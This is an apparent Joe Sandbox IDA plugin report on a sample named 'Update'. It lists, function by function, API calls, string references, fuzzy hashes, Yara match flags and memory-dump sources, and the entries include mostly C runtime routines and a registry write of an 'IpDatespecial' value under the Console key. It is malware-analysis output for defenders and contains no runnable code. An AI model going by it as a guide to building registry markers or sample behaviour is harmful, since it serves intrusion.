Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: e7b6d18af818ad00caccf0a2c676cf3d1bf75309cde6fcc3920efed68a9ec567
Instruction ID: c28c5bc37580f2fe66598c6c34047c8812c36f9a549ec23460275c4ceff0374a
Opcode Fuzzy Hash: e7b6d18af818ad00caccf0a2c676cf3d1bf75309cde6fcc3920efed68a9ec567
Instruction Fuzzy Hash: 4041C234E102199BCF00DF68C981ADEBBF5AF45318F148155E814ABB51D731DADACB94

Function 6CAACC10 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,9AFB9AC3,?,6CAACD1F,6CAA5151,?,00000000), ref: 6CAACCD1

Strings

ext-ms-, xrefs: 6CAACC7B
api-ms-, xrefs: 6CAACC67

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: d19c579314896d083223fccecf06474696f98c40b998bca872fe98558f9f1c3f
Instruction ID: 4670f97e56491f4d885b6f141f7139038433fee77460d2434749c6e91e31bc6f
Opcode Fuzzy Hash: d19c579314896d083223fccecf06474696f98c40b998bca872fe98558f9f1c3f
Instruction Fuzzy Hash: 0521F331B01621FBEB16BFA9CC44A5A37789B4276CF284611E915A7680D732EA83C7D0

Function 03808DB5 Relevance: 10.6, APIs: 7, Instructions: 51COMMON

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 03808DB5

Part of subcall function 03801EE8: __NMSG_WRITE.LIBCMT ref: 03801F0F
Part of subcall function 03801EE8: __NMSG_WRITE.LIBCMT ref: 03801F19

__NMSG_WRITE.LIBCMT ref: 03808DBC

Part of subcall function 03801D39: GetModuleFileNameW.KERNEL32(00000000,0381FF62,00000104,00000000,00000000,?), ref: 03801DD5
Part of subcall function 03801D39: __invoke_watson.LIBCMT ref: 03801DFE
Part of subcall function 03801D39: _wcslen.LIBCMT ref: 03801E04
Part of subcall function 03801D39: _wcslen.LIBCMT ref: 03801E11

Part of subcall function 03801A78: ___crtCorExitProcess.LIBCMT ref: 03801A80
Part of subcall function 03801A78: ExitProcess.KERNEL32 ref: 03801A89

__malloc_crt.LIBCMT ref: 03808DE1

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: ExitProcess_wcslen$FileModuleName___crt__invoke_watson__malloc_crt
String ID:
API String ID: 2521357910-0
Opcode ID: 2e336b46813bb123bd8740105b134368aeae54145c39dfbeea9f3ee508290865
Instruction ID: 6414fbe71675de7d266c45f2cd3b737dc44c7f2616b0df9b1c5302bf5b633bb2
Opcode Fuzzy Hash: 2e336b46813bb123bd8740105b134368aeae54145c39dfbeea9f3ee508290865
Instruction Fuzzy Hash: 8B01C07A644306AEDBA0FFF8AC4862E33A46B41764F2004E8D251EF2D0CE7009C19B13

Function 037FE6B0 Relevance: 10.5, APIs: 7, Instructions: 44filesynchronizationstringCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,037FE815,?,?,?,?,74DF23A0,00000000), ref: 037FE6BD
CreateFileW.KERNEL32(03820D80,40000000,00000002,00000000,00000004,00000002,00000000,?,?,037FE815,?,?,?,?,74DF23A0,00000000), ref: 037FE6D7
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 037FE6F2
lstrlenW.KERNEL32(?,00000000,00000000), ref: 037FE6FF
WriteFile.KERNEL32(00000000,?,00000000), ref: 037FE70A
CloseHandle.KERNEL32(00000000), ref: 037FE711
ReleaseMutex.KERNEL32(00000000), ref: 037FE71E

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleMutexObjectPointerReleaseSingleWaitWritelstrlen
String ID:
API String ID: 4202892810-0
Opcode ID: f38016828063364bcf2157de7e30f4816bf04d095319e4b14374bd860501b74e
Instruction ID: 216e6d3efdea405e874726c962697e4a31406f1050e9e6f5e051c49ceb4fa21e
Opcode Fuzzy Hash: f38016828063364bcf2157de7e30f4816bf04d095319e4b14374bd860501b74e
Instruction Fuzzy Hash: 1A016871281614BBE324F7B4AC0EF5E7B6CEB09B25F104784F725E61C4D7B469108765

Function 03803D2E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,03816318,00000008,03803E36,00000000,00000000,?,03801EEF,00000003,03801CFF,?,03808E82,00000011,00000000,?,03803F06), ref: 03803D3F
__lock.LIBCMT ref: 03803D73

Part of subcall function 03808E5B: __amsg_exit.LIBCMT ref: 03808E7D
Part of subcall function 03808E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,03803F06,0000000D,03816340,00000008,03803FFF,00000000,?,038010F0,00000000,03816278,00000008,03801155,?), ref: 03808E85

InterlockedIncrement.KERNEL32(?), ref: 03803D80
__lock.LIBCMT ref: 03803D94
___addlocaleref.LIBCMT ref: 03803DB2

Strings

KERNEL32.DLL, xrefs: 03803D3A

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit
String ID: KERNEL32.DLL
API String ID: 3732598078-2576044830
Opcode ID: 93791126f968966b14353c3482e58bbc7ba4a885066364bc1c8f6a376c32c905
Instruction ID: 4c72211985ee38a2dd734026de5b0e7ade126f1b6f115bdc652f1441ea171e3d
Opcode Fuzzy Hash: 93791126f968966b14353c3482e58bbc7ba4a885066364bc1c8f6a376c32c905
Instruction Fuzzy Hash: 4E013C79440B00EAD7A0EFA99804749FBE4AF80320F104989D9AA9B2D0CBB4A644CB16

Function 100097E2 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,10017C00,00000008,100098EA,00000000,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C), ref: 100097F3
__lock.LIBCMT ref: 10009827

Part of subcall function 1000C144: __mtinitlocknum.LIBCMT ref: 1000C15A
Part of subcall function 1000C144: __amsg_exit.LIBCMT ref: 1000C166
Part of subcall function 1000C144: EnterCriticalSection.KERNEL32(00000000,00000000,?,100099BA,0000000D,10017C28,00000008,10009AB1,00000000,?,10007711,00000000,10017B60,00000008,10007776,?), ref: 1000C16E

InterlockedIncrement.KERNEL32(?), ref: 10009834
__lock.LIBCMT ref: 10009848
___addlocaleref.LIBCMT ref: 10009866

Strings

KERNEL32.DLL, xrefs: 100097EE

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: 2fd8a646381f8c1273ec5aa8b514110e131a74dbccaeb09b5e4df53804c3848b
Instruction ID: 89763b3cff33ace5d26e8772c174daa1abf762224351bfae7625883661725aa5
Opcode Fuzzy Hash: 2fd8a646381f8c1273ec5aa8b514110e131a74dbccaeb09b5e4df53804c3848b
Instruction Fuzzy Hash: 1A016D75804B00DFE320DF69C84574ABBE0EF41361F14890EE49A9B3A5CBB4F680CB55

Function 037FB78C Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 32registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 037FB7A7
RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 037FB7B7
RegSetValueExW.ADVAPI32(?,IpDatespecial,00000000,00000003,?,00000004), ref: 037FB7CE
RegCloseKey.ADVAPI32(?,?,00000004), ref: 037FB7D9

Strings

Console, xrefs: 037FB79D
IpDatespecial, xrefs: 037FB7B1, 037FB7C8

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Value$CloseDeleteOpen
String ID: Console$IpDatespecial
API String ID: 3183427449-1840232981
Opcode ID: c0fccccb02fcedc2a4403f871292bf1c046568af7a48fd96d0909da7018dbd0f
Instruction ID: 75e59a549e3fd198062e1a7bdb3ea4fd3e144cf6f500f1e8483cf4c6f3d02721
Opcode Fuzzy Hash: c0fccccb02fcedc2a4403f871292bf1c046568af7a48fd96d0909da7018dbd0f
Instruction Fuzzy Hash: B3F08C75244340EFE324A7A0AC4AF5AB768FB89B11F504A8DFA84A6281C6A4A111C666

Function 038102FC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0381031D

Part of subcall function 03803E5B: __getptd_noexit.LIBCMT ref: 03803E5E
Part of subcall function 03803E5B: __amsg_exit.LIBCMT ref: 03803E6B

__getptd.LIBCMT ref: 0381032E
__getptd.LIBCMT ref: 0381033C

Strings

MOC, xrefs: 0381030F
csm, xrefs: 03810316
RCC, xrefs: 03810308

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$RCC$csm
API String ID: 803148776-2671469338
Opcode ID: a1f0d33c8d38bd48e94782b4de51ff7935ea793739f44933f6f473294c896614
Instruction ID: 9deb6596afb51e8f787541e6357bda4494352e11926b5f623d318ee4b1874125
Opcode Fuzzy Hash: a1f0d33c8d38bd48e94782b4de51ff7935ea793739f44933f6f473294c896614
Instruction Fuzzy Hash: C3E01AB8500208CFCB20EBECC88AB6836DDBB88714F5905E1D40CCF662C778E4E08993

Function 100133F1 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 10013412

Part of subcall function 1000990F: __getptd_noexit.LIBCMT ref: 10009912
Part of subcall function 1000990F: __amsg_exit.LIBCMT ref: 1000991F

__getptd.LIBCMT ref: 10013423
__getptd.LIBCMT ref: 10013431

Strings

csm, xrefs: 1001340B
MOC, xrefs: 10013404
RCC, xrefs: 100133FD

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$RCC$csm
API String ID: 803148776-2671469338
Opcode ID: 6cafc6eb67b1167ca934f12c74b901a19b36c58c2209ef507fb1707306695bdb
Instruction ID: 786e14bf1501c0e18a8257e8a75f03574bdb54e2dd84c562cebc2d2ff3df38bd
Opcode Fuzzy Hash: 6cafc6eb67b1167ca934f12c74b901a19b36c58c2209ef507fb1707306695bdb
Instruction Fuzzy Hash: 86E01A345042488FE720DB68C04AB5933E4FBC8294F5680A5F41ECF226C738FD908942

Function 037F9C30 Relevance: 9.1, APIs: 6, Instructions: 108COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 037F9C3F

Part of subcall function 037FF673: __FF_MSGBANNER.LIBCMT ref: 037FF68C
Part of subcall function 037FF673: __NMSG_WRITE.LIBCMT ref: 037FF693
Part of subcall function 037FF673: RtlAllocateHeap.NTDLL(00000000,00000001,74DEDFF0,00000000,00000000,?,03804500,?,74DEDFF0,00000000,?,038081D6,00000000,?,?,?), ref: 037FF6B8

_free.LIBCMT ref: 037F9C63
_memset.LIBCMT ref: 037F9CBB

Part of subcall function 037FA610: GetObjectW.GDI32(?,00000054,?), ref: 037FA62E

CreateDIBSection.GDI32(00000000,00000008,00000000,00000000,00000000,00000000), ref: 037F9CD3
_free.LIBCMT ref: 037F9CE4
_free.LIBCMT ref: 037F9D23

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: _free$AllocateCreateHeapObjectSection_malloc_memset
String ID:
API String ID: 1756752955-0
Opcode ID: 7ada5016fd7dd0244fd30d405748e4ab146a64c65fb02b106da8da69d8b7525a
Instruction ID: 051167af1af71b7720e848299c41f8d1e12e711811623c3edd811d7e7569f858
Opcode Fuzzy Hash: 7ada5016fd7dd0244fd30d405748e4ab146a64c65fb02b106da8da69d8b7525a
Instruction Fuzzy Hash: 02318FB26003056FE710DE7AD884B56B7D8BF4A314F04853ADB099B740EBB1E454CBA1

Function 037F5080 Relevance: 9.1, APIs: 6, Instructions: 107networkCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(000002FF), ref: 037F50CA
WSASetLastError.WS2_32(0000139F), ref: 037F50E2
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,00000000,000000FF), ref: 037F50EC

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterErrorLastLeave
String ID:
API String ID: 4082018349-0
Opcode ID: c5e129316422075b5ea2f6e5309d708dd7e6fb5c90b165c30c305f301ca7c117
Instruction ID: 0ecf684ce999f9e3127fc13b91139350b11270632c6b1c462f246df854fa3812
Opcode Fuzzy Hash: c5e129316422075b5ea2f6e5309d708dd7e6fb5c90b165c30c305f301ca7c117
Instruction Fuzzy Hash: 77318E766047489FD714DF65D949B6AB3ACFB49720F004A5EEA15C7780E736A810CB50

Function 10005060 Relevance: 9.1, APIs: 6, Instructions: 107networkCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,4B556414,?,?,10014228,000000FF), ref: 100050AA
WSASetLastError.WS2_32(0000139F,?,?,?,?,4B556414,?,?,10014228,000000FF), ref: 100050C2
LeaveCriticalSection.KERNEL32(?), ref: 100050CC

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeave
String ID:
API String ID: 4082018349-0
Opcode ID: e00a6cd020c07df668690f03d4002b5b8c2a1b96598de1bbe6df2cd43adfd620
Instruction ID: 94e9e828bd4e4f39969e9d0b2c4f8dfc3b4d38cc2041e0ad1404f002baf5890c
Opcode Fuzzy Hash: e00a6cd020c07df668690f03d4002b5b8c2a1b96598de1bbe6df2cd43adfd620
Instruction Fuzzy Hash: DE316D76A04644EBE711CF95DD86BABB3E8FB48752F008A1AF906C7645D776E800CB90

Function 1000485A Relevance: 9.1, APIs: 6, Instructions: 91sleepsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 100048E1
WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 100048EC
Sleep.KERNEL32(00000258,?,E484B528,?,?,?), ref: 100048F9
CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 10004914
CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 1000491D
Sleep.KERNEL32(0000012C,?,E484B528,?,?,?), ref: 1000492E

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: CloseHandleObjectSingleSleepWait
String ID:
API String ID: 640476663-0
Opcode ID: f4c70dc776f0c36d6c3e242216426f5c740d9caf6da259f6a897f5b04df83c22
Instruction ID: db8a483aedded49ec56de4fe6a38a5b8db7edc3383aabb911f028b40afcbc516
Opcode Fuzzy Hash: f4c70dc776f0c36d6c3e242216426f5c740d9caf6da259f6a897f5b04df83c22
Instruction Fuzzy Hash: E6216AB61046548FD750EBA8CC8498BF3F9FF893507198B08E5948B395CA34DC05CBA4

Function 6CAA93B0 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,6CAA93A7,6CAA9BB5,?,?,?,?,6CA9D5F2,?,?,?,?,?,00000000,00000000), ref: 6CAA93BE
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CAA93CC
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CAA93E5
SetLastError.KERNEL32(00000000,?,?,6CA9D5F2,?,?,?,?,?,00000000,00000000,00000000,?,?,?), ref: 6CAA9437

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 6a544477970cb38b19743ab2593f8220c0b9ce95d18487d5a845e957388af98e
Instruction ID: 9aa15b8536096b382b2538a7885e3ef592cd8a0961d18fc3a9a1bbb1a7c43e7d
Opcode Fuzzy Hash: 6a544477970cb38b19743ab2593f8220c0b9ce95d18487d5a845e957388af98e
Instruction Fuzzy Hash: AC01B93230A7169FAA1815F96DC95473BFCEB0227C724432AF510579D0EF13898B8250

Function 6CAA9CA3 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 6CAA9DC2
CallUnexpected.LIBVCRUNTIME ref: 6CAAA03B

Strings

csm, xrefs: 6CAA9CE0
csm, xrefs: 6CAA9DF9
csm, xrefs: 6CAA9D4D

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: CallUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 2673424686-393685449
Opcode ID: e93e77da4374859ac1a99c42dcc02faad5b10c4b67f4311b2dfc08731f85731b
Instruction ID: 4718e08aa8259649cf6337fc789f22bb97077d4554eea67b1982888f8c09fa9a
Opcode Fuzzy Hash: e93e77da4374859ac1a99c42dcc02faad5b10c4b67f4311b2dfc08731f85731b
Instruction Fuzzy Hash: 47B17B71800209EFCF05CFF6CA809DEB7B5BF08309B18415AE8156BA15D736DADACB91

Function 038105AE Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 038105D6

Part of subcall function 038100B7: __getptd.LIBCMT ref: 038100C5
Part of subcall function 038100B7: __getptd.LIBCMT ref: 038100D3

__getptd.LIBCMT ref: 038105E0

Part of subcall function 03803E5B: __getptd_noexit.LIBCMT ref: 03803E5E
Part of subcall function 03803E5B: __amsg_exit.LIBCMT ref: 03803E6B

__getptd.LIBCMT ref: 038105EE
__getptd.LIBCMT ref: 038105FC
__getptd.LIBCMT ref: 03810607
_CallCatchBlock2.LIBCMT ref: 0381062D

Part of subcall function 0381015C: __CallSettingFrame@12.LIBCMT ref: 038101A8

Part of subcall function 038106D4: __getptd.LIBCMT ref: 038106E3
Part of subcall function 038106D4: __getptd.LIBCMT ref: 038106F1

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 781f0dead4b04b0b1df728989b60ec0f4a969a1ea6219a1764e7c7fc0b2e53c7
Instruction ID: 764479df9af616212ea460aa5328a5cff058bb9779f46178939b263f9c67f89d
Opcode Fuzzy Hash: 781f0dead4b04b0b1df728989b60ec0f4a969a1ea6219a1764e7c7fc0b2e53c7
Instruction Fuzzy Hash: 2811E4B9D00309DFDF40EFE8C884AAD7BB4FB04210F1081A9E865EB290DB789A519F51

Function 100136A3 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 100136CB

Part of subcall function 1001325B: __getptd.LIBCMT ref: 10013269
Part of subcall function 1001325B: __getptd.LIBCMT ref: 10013277

__getptd.LIBCMT ref: 100136D5

Part of subcall function 1000990F: __getptd_noexit.LIBCMT ref: 10009912
Part of subcall function 1000990F: __amsg_exit.LIBCMT ref: 1000991F

__getptd.LIBCMT ref: 100136E3
__getptd.LIBCMT ref: 100136F1
__getptd.LIBCMT ref: 100136FC
_CallCatchBlock2.LIBCMT ref: 10013722

Part of subcall function 10013300: __CallSettingFrame@12.LIBCMT ref: 1001334C

Part of subcall function 100137C9: __getptd.LIBCMT ref: 100137D8
Part of subcall function 100137C9: __getptd.LIBCMT ref: 100137E6

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 9bbf850cd10a9d142d7ef01923f7ba9f09fdf63f4c6847773a26cfd91f606182
Instruction ID: 22efbb8b190092b33748bf873c8b025e1b03d977775ae1c5574abea826c94994
Opcode Fuzzy Hash: 9bbf850cd10a9d142d7ef01923f7ba9f09fdf63f4c6847773a26cfd91f606182
Instruction Fuzzy Hash: 06112BB5C04209DFDF10DFA4D445AEEBBB1FF48310F10806AF864AB251DB38AA559F50

Function 03804885 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 03804891

Part of subcall function 03803E5B: __getptd_noexit.LIBCMT ref: 03803E5E
Part of subcall function 03803E5B: __amsg_exit.LIBCMT ref: 03803E6B

__amsg_exit.LIBCMT ref: 038048B1
__lock.LIBCMT ref: 038048C1
InterlockedDecrement.KERNEL32(?), ref: 038048DE
_free.LIBCMT ref: 038048F1
InterlockedIncrement.KERNEL32(03992830), ref: 03804909

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: bb4ecff8e1a2897b73b98ecc2935036c8fdc93f123dc02e1eae50d26c5147f50
Instruction ID: bb27dc11b4b305ed5e20a63ba32c64a2af7b19cdad7356de1644d18d2ef6a0d9
Opcode Fuzzy Hash: bb4ecff8e1a2897b73b98ecc2935036c8fdc93f123dc02e1eae50d26c5147f50
Instruction Fuzzy Hash: DD01A136981B559BE6A0EFEA9C4475DF3A4BF44720F0804D5DA14EB2C0CB746541CFD2

Function 1000D9BE Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 1000D9CA

Part of subcall function 1000990F: __getptd_noexit.LIBCMT ref: 10009912
Part of subcall function 1000990F: __amsg_exit.LIBCMT ref: 1000991F

__amsg_exit.LIBCMT ref: 1000D9EA
